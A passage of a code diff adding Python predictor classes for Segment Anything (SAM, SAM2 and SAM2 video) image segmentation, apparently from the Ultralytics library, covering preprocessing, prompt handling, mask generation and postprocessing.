(torch.Tensor): The preprocessed image tensor, normalized and converted to the appropriate dtype. + + Examples: + >>> predictor = Predictor() + >>> image = torch.rand(1, 3, 640, 640) + >>> preprocessed_image = predictor.preprocess(image) + """ + if self.im is not None: + return self.im + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) + im = np.ascontiguousarray(im) + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() + if not_tensor: + im = (im - self.mean) / self.std + return im + + def pre_transform(self, im): + """ + Perform initial transformations on the input image for preprocessing. + + This method applies transformations such as resizing to prepare the image for further preprocessing. + Currently, batched inference is not supported; hence the list length should be 1. + + Args: + im (List[np.ndarray]): List containing a single image in HWC numpy array format. + + Returns: + (List[np.ndarray]): List containing the transformed image. + + Raises: + AssertionError: If the input list contains more than one image. + + Examples: + >>> predictor = Predictor() + >>> image = np.random.rand(480, 640, 3) # Single HWC image + >>> transformed = predictor.pre_transform([image]) + >>> print(len(transformed)) + 1 + """ + assert len(im) == 1, "SAM model does not currently support batched inference" + letterbox = LetterBox(self.args.imgsz, auto=False, center=False) + return [letterbox(image=x) for x in im] + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. + + This method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt + encoder, and mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W). For SAM H=W=256. + multimask_output (bool): Flag to return multiple masks. Helpful for ambiguous prompts. + *args (Any): Additional positional arguments. + **kwargs (Any): Additional keyword arguments. + + Returns: + (np.ndarray): The output masks in shape (C, H, W), where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + (np.ndarray): Low-resolution logits of shape (C, H, W) for subsequent inference, where H=W=256. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model_path="sam_model.pt") + >>> predictor.set_image("image.jpg") + >>> masks, scores, logits = predictor.inference(im, bboxes=[[0, 0, 100, 100]]) + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + labels = self.prompts.pop("labels", labels) + + if all(i is None for i in [bboxes, points, masks]): + return self.generate(im, *args, **kwargs) + + return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output) + + def prompt_inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False): + """ + Performs image segmentation inference based on input cues using SAM's specialized architecture. + + This internal function leverages the Segment Anything Model (SAM) for prompt-based, real-time segmentation. + It processes various input prompts such as bounding boxes, points, and masks to generate segmentation masks. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (np.ndarray | None): Low-res masks from previous predictions with shape (N, H, W). For SAM, H=W=256. + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. + crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. + pred_mask = pred_mask > self.model.mask_threshold + # (N, 4) + pred_bbox = batched_mask_to_box(pred_mask).float() + keep_mask = ~is_box_near_crop_edge(pred_bbox, crop_region, [0, 0, iw, ih]) + if not torch.all(keep_mask): + pred_bbox, pred_mask, pred_score = pred_bbox[keep_mask], pred_mask[keep_mask], pred_score[keep_mask] + + crop_masks.append(pred_mask) + crop_bboxes.append(pred_bbox) + crop_scores.append(pred_score) + + # Do nms within this crop + crop_masks = torch.cat(crop_masks) + crop_bboxes = torch.cat(crop_bboxes) + crop_scores = torch.cat(crop_scores) + keep = torchvision.ops.nms(crop_bboxes, crop_scores, self.args.iou) # NMS + crop_bboxes = uncrop_boxes_xyxy(crop_bboxes[keep], crop_region) + crop_masks = uncrop_masks(crop_masks[keep], crop_region, ih, iw) + crop_scores = crop_scores[keep] + + pred_masks.append(crop_masks) + pred_bboxes.append(crop_bboxes) + pred_scores.append(crop_scores) + region_areas.append(area.expand(len(crop_masks))) + + pred_masks = torch.cat(pred_masks) + pred_bboxes = torch.cat(pred_bboxes) + pred_scores = torch.cat(pred_scores) + region_areas = torch.cat(region_areas) + + # Remove duplicate masks between crops + if len(crop_regions) > 1: + scores = 1 / region_areas + keep = torchvision.ops.nms(pred_bboxes, scores, crop_nms_thresh) + pred_masks, pred_bboxes, pred_scores = pred_masks[keep], pred_bboxes[keep], pred_scores[keep] + + return pred_masks, pred_scores, pred_bboxes + + def setup_model(self, model=None, verbose=True): + """ + Initializes the Segment Anything Model (SAM) for inference. + + This method sets up the SAM model by allocating it to the appropriate device and initializing the necessary + parameters for image normalization and other Ultralytics compatibility settings. + + Args: + model (torch.nn.Module | None): A pretrained SAM model. If None, a new model is built based on config. + verbose (bool): If True, prints selected device information. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_model(model=sam_model, verbose=True) + """ + device = select_device(self.args.device, verbose=verbose) + if model is None: + model = self.get_model() + model.eval() + self.model = model.to(device) + self.device = device + self.mean = torch.tensor([123.675, 116.28, 103.53]).view(-1, 1, 1).to(device) + self.std = torch.tensor([58.395, 57.12, 57.375]).view(-1, 1, 1).to(device) + + # Ultralytics compatibility settings + self.model.pt = False + self.model.triton = False + self.model.stride = 32 + self.model.fp16 = False + self.done_warmup = True + + def get_model(self): + """Retrieves or builds the Segment Anything Model (SAM) for image segmentation tasks.""" + return build_sam(self.args.model) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes SAM's inference outputs to generate object detection masks and bounding boxes. + + This method scales masks and boxes to the original image size and applies a threshold to the mask + predictions. It leverages SAM's advanced architecture for real-time, promptable segmentation tasks. + + Args: + preds (Tuple[torch.Tensor]): The output from SAM model inference, containing: + - pred_masks (torch.Tensor): Predicted masks with shape (N, 1, H, W). + - pred_scores (torch.Tensor): Confidence scores for each mask with shape (N, 1). + - pred_bboxes (torch.Tensor, optional): Predicted bounding boxes if segment_all is True. + img (torch.Tensor): The processed input image tensor with shape (C, H, W). + orig_imgs (List[np.ndarray] | torch.Tensor): The original, unprocessed images. + + Returns: + results (List[Results]): List of Results objects containing detection masks, bounding boxes, and other + metadata for each processed image. + + Examples: + >>> predictor = Predictor() + >>> preds = predictor.inference(img) + >>> results = predictor.postprocess(preds, img, orig_imgs) + """ + # (N, 1, H, W), (N, 1) + pred_masks, pred_scores = preds[:2] + pred_bboxes = preds[2] if self.segment_all else None + names = dict(enumerate(str(i) for i in range(len(pred_masks)))) + + if not isinstance(orig_imgs, list): # input images are a torch.Tensor, not a list + orig_imgs = ops.convert_torch2numpy_batch(orig_imgs) + + results = [] + for masks, orig_img, img_path in zip([pred_masks], orig_imgs, self.batch[0]): + if len(masks) == 0: + masks, pred_bboxes = None, torch.zeros((0, 6), device=pred_masks.device) + else: + masks = ops.scale_masks(masks[None].float(), orig_img.shape[:2], padding=False)[0] + masks = masks > self.model.mask_threshold # to bool + if pred_bboxes is not None: + pred_bboxes = ops.scale_boxes(img.shape[2:], pred_bboxes.float(), orig_img.shape, padding=False) + else: + pred_bboxes = batched_mask_to_box(masks) + # NOTE: SAM models do not return cls info. This `cls` here is just a placeholder for consistency. + cls = torch.arange(len(pred_masks), dtype=torch.int32, device=pred_masks.device) + pred_bboxes = torch.cat([pred_bboxes, pred_scores[:, None], cls[:, None]], dim=-1) + results.append(Results(orig_img, path=img_path, names=names, masks=masks, boxes=pred_bboxes)) + # Reset segment-all mode. + self.segment_all = False + return results + + def setup_source(self, source): + """ + Sets up the data source for inference. + + This method configures the data source from which images will be fetched for inference. It supports + various input types such as image files, directories, video files, and other compatible data sources. + + Args: + source (str | Path | None): The path or identifier for the image data source. Can be a file path, + directory path, URL, or other supported source types. + + Examples: + >>> predictor = Predictor() + >>> predictor.setup_source("path/to/images") + >>> predictor.setup_source("video.mp4") + >>> predictor.setup_source(None) # Uses default source if available + + Notes: + - If source is None, the method may use a default source if configured. + - The method adapts to different source types and prepares them for subsequent inference steps. + - Supported source types may include local files, directories, URLs, and video streams. + """ + if source is not None: + super().setup_source(source) + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference. + + This method prepares the model for inference on a single image by setting up the model if not already + initialized, configuring the data source, and preprocessing the image for feature extraction. It + ensures that only one image is set at a time and extracts image features for subsequent use. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing + an image read by cv2. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(cv2.imread("path/to/image.jpg")) + + Notes: + - This method should be called before performing inference on a new image. + - The extracted features are stored in the `self.features` attribute for later use. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. + + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. + prompts (Dict): Dictionary to store various types of prompts for inference. + + Methods: + get_model: Retrieves and initializes the SAM2 model. + prompt_inference: Performs image segmentation inference based on various prompts. + set_image: Preprocesses and sets a single image for inference. + get_im_features: Extracts and processes image features using SAM2's image encoder. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> predictor.set_image("path/to/image.jpg") + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, _ = predictor.prompt_inference(predictor.im, bboxes=bboxes) + >>> print(f"Predicted {len(masks)} masks with average score {scores.mean():.2f}") + """ + + _bb_feat_sizes = [ + (256, 256), + (128, 128), + (64, 64), + ] + + def get_model(self): + """Retrieves and initializes the Segment Anything Model 2 (SAM2) for image segmentation tasks.""" + return build_sam(self.args.model) + + def prompt_inference( + self, + im, + bboxes=None, + points=None, + labels=None, + masks=None, + multimask_output=False, + img_idx=-1, + ): + """ + Performs image segmentation inference based on various prompts using SAM2 architecture. + + This method leverages the Segment Anything Model 2 (SAM2) to generate segmentation masks for input images + based on provided prompts such as bounding boxes, points, or existing masks. It supports both single and + multi-object prediction scenarios. + + Args: + im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W). + bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels. + labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background. + masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W). + multimask_output (bool): Flag to return multiple masks for ambiguous prompts. + img_idx (int): Index of the image in the batch to process. + + Returns: + (np.ndarray): Output masks with shape (C, H, W), where C is the number of generated masks. + (np.ndarray): Quality scores for each mask, with length C. + + Examples: + >>> predictor = SAM2Predictor(cfg) + >>> image = torch.rand(1, 3, 640, 640) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(image, bboxes=bboxes) + >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}") + + Notes: + - The method supports batched inference for multiple objects when points or bboxes are provided. + - Input prompts (bboxes, points) are automatically scaled to match the input image dimensions. + - When both bboxes and points are provided, they are merged into a single 'points' input for the model. + + References: + - SAM2 Paper: [Add link to SAM2 paper when available] + """ + features = self.get_im_features(im) if self.features is None else self.features + + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + + sparse_embeddings, dense_embeddings = self.model.sam_prompt_encoder( + points=points, + boxes=None, + masks=masks, + ) + # Predict masks + batched_mode = points is not None and points[0].shape[0] > 1 # multi object prediction + high_res_features = [feat_level[img_idx].unsqueeze(0) for feat_level in features["high_res_feats"]] + pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder( + image_embeddings=features["image_embed"][img_idx].unsqueeze(0), + image_pe=self.model.sam_prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + repeat_image=batched_mode, + high_res_features=high_res_features, + ) + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. + + Returns: + (tuple): A tuple containing transformed points, labels, and masks. + """ + bboxes, points, labels, masks = super()._prepare_prompts(dst_shape, bboxes, points, labels, masks) + if bboxes is not None: + bboxes = bboxes.view(-1, 2, 2) + bbox_labels = torch.tensor([[2, 3]], dtype=torch.int32, device=bboxes.device).expand(len(bboxes), -1) + # NOTE: merge "boxes" and "points" into a single "points" input + # (where boxes are added at the beginning) to model.sam_prompt_encoder + if points is not None: + points = torch.cat([bboxes, points], dim=1) + labels = torch.cat([bbox_labels, labels], dim=1) + else: + points, labels = bboxes, bbox_labels + return points, labels, masks + + def set_image(self, image): + """ + Preprocesses and sets a single image for inference using the SAM2 model. + + This method initializes the model if not already done, configures the data source to the specified image, + and preprocesses the image for feature extraction. It supports setting only one image at a time. + + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. + + This class extends the functionality of SAM2Predictor to support video processing and maintains + the state of inference operations. It includes configurations for managing non-overlapping masks, + clearing memory for non-conditional inputs, and setting up callbacks for prediction events. + + Attributes: + inference_state (Dict): A dictionary to store the current state of inference operations. + non_overlap_masks (bool): A flag indicating whether masks should be non-overlapping. + clear_non_cond_mem_around_input (bool): A flag to control clearing non-conditional memory around inputs. + clear_non_cond_mem_for_multi_obj (bool): A flag to control clearing non-conditional memory for multi-object scenarios. + callbacks (Dict): A dictionary of callbacks for various prediction lifecycle events. + + Args: + cfg (Dict, Optional): Configuration settings for the predictor. Defaults to DEFAULT_CFG. + overrides (Dict, Optional): Additional configuration overrides. Defaults to None. + _callbacks (List, Optional): Custom callbacks to be added. Defaults to None. + + Note: + The `fill_hole_area` attribute is defined but not used in the current implementation. + """ + + # fill_hole_area = 8 # not used + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the predictor with configuration and optional overrides. + + This constructor initializes the SAM2VideoPredictor with a given configuration, applies any + specified overrides, and sets up the inference state along with certain flags + that control the behavior of the predictor. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG) + >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640}) + >>> predictor = SAM2VideoPredictor(_callbacks={"on_predict_start": custom_callback}) + """ + super().__init__(cfg, overrides, _callbacks) + self.inference_state = {} + self.non_overlap_masks = True + self.clear_non_cond_mem_around_input = False + self.clear_non_cond_mem_for_multi_obj = False + self.callbacks["on_predict_start"].append(self.init_state) + + def get_model(self): + """ + Retrieves and configures the model with binarization enabled. + + Note: + This method overrides the base class implementation to set the binarize flag to True. + """ + model = super().get_model() + model.set_binarize(True) + return model + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. This + method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt encoder, and + mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List, optional): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List, optional): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List, optional): Labels for point prompts, shape (N, ). 1 = foreground, 0 = background. + masks (np.ndarray, optional): Low-resolution masks from previous predictions shape (N,H,W). For SAM H=W=256. + + Returns: + (np.ndarray): The output masks in shape CxHxW, where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after tracking. + self._add_output_per_object(frame, current_out, storage_key) + self.inference_state["frames_already_tracked"].append(frame) + pred_masks = current_out["pred_masks"].flatten(0, 1) + pred_masks = pred_masks[(pred_masks > self.model.mask_threshold).sum((1, 2)) > 0] # filter blank masks + + return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes the predictions to apply non-overlapping constraints if required. + + This method extends the post-processing functionality by applying non-overlapping constraints + to the predicted masks if the `non_overlap_masks` flag is set to True. This ensures that + the masks do not overlap, which can be useful for certain applications. + + Args: + preds (Tuple[torch.Tensor]): The predictions from the model. + img (torch.Tensor): The processed image tensor. + orig_imgs (List[np.ndarray]): The original images before processing. + + Returns: + results (list): The post-processed predictions. + + Note: + If `non_overlap_masks` is True, the method applies constraints to ensure non-overlapping masks. + """ + results = super().postprocess(preds, img, orig_imgs) + if self.non_overlap_masks: + for result in results: + if result.masks is None or len(result.masks) == 0: + continue + result.masks.data = self.model._apply_non_overlapping_constraints(result.masks.data.unsqueeze(0))[0] + return results + + @smart_inference_mode() + def add_new_prompts( + self, + obj_id, + points=None, + labels=None, + masks=None, + frame_idx=0, + ): + """ + Adds new points or masks to a specific frame for a given object ID. + + This method updates the inference state with new prompts 